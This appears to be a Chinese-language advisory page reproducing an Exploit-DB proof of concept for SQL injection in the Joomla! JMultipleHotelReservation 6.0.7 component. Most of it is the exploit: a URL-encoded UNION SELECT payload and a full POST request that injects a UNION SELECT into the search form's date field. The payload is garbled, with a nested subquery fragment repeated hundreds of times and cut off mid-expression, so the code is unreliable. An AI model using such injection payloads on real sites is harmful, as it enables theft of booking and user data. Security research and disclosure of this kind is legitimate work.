Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection 漏洞概述 EDB-ID: 46232 作者: Ihsan Sencan 类型: WEBAPPS 平台: PHP 日期: 2019-01-23 漏洞描述: Joomla! 组件 JMultipleHotelReservation 6.0.7 存在 SQL 注入漏洞。 影响范围 受影响版本: JMultipleHotelReservation 6.0.7 测试环境: WIN7 x64, Kali Linux x64 修复方案 建议: 更新到最新版本的 JMultipleHotelReservation 组件,或采取其他安全措施以防止 SQL 注入攻击。 POC 代码 ```plaintext Exploit Title: Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection Dork: N/A Date: 2019-01-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://csjunkie.com/ Software Link: https://extensions.joomla.org/extensions/extension-markets/booking-a-reservations/jmultiplehotelreservation/ Version: 6.0.7 Category: Webapps Tested on: WIN7 x64,KaliLinux_x64 CVE: N/A POC: 1) http://localhost/[PATH]/j-myhotel/search-hotels?view=hotels %31%2d%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%73%65%6c%45%43%54(%74%28%40%78%29%66%52%4f%6d%28%73%65%6c%45%43%54%74% POST /[PATH]/j-myhotel/search-hotels?view=hotels HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 905 Cookie: _cfduid=d35dbe40eb0461bf69a9165df9601951548240991; PHPSESSID=6cec795380ae5a2588be1dd57e04320a; c9ffd68b334eb414c880fa254194ecbb=6053fbfb8394c9543ab2169c4399aefc DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=6&day_end UNION SELECT 1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)FROM(SELECT(@x)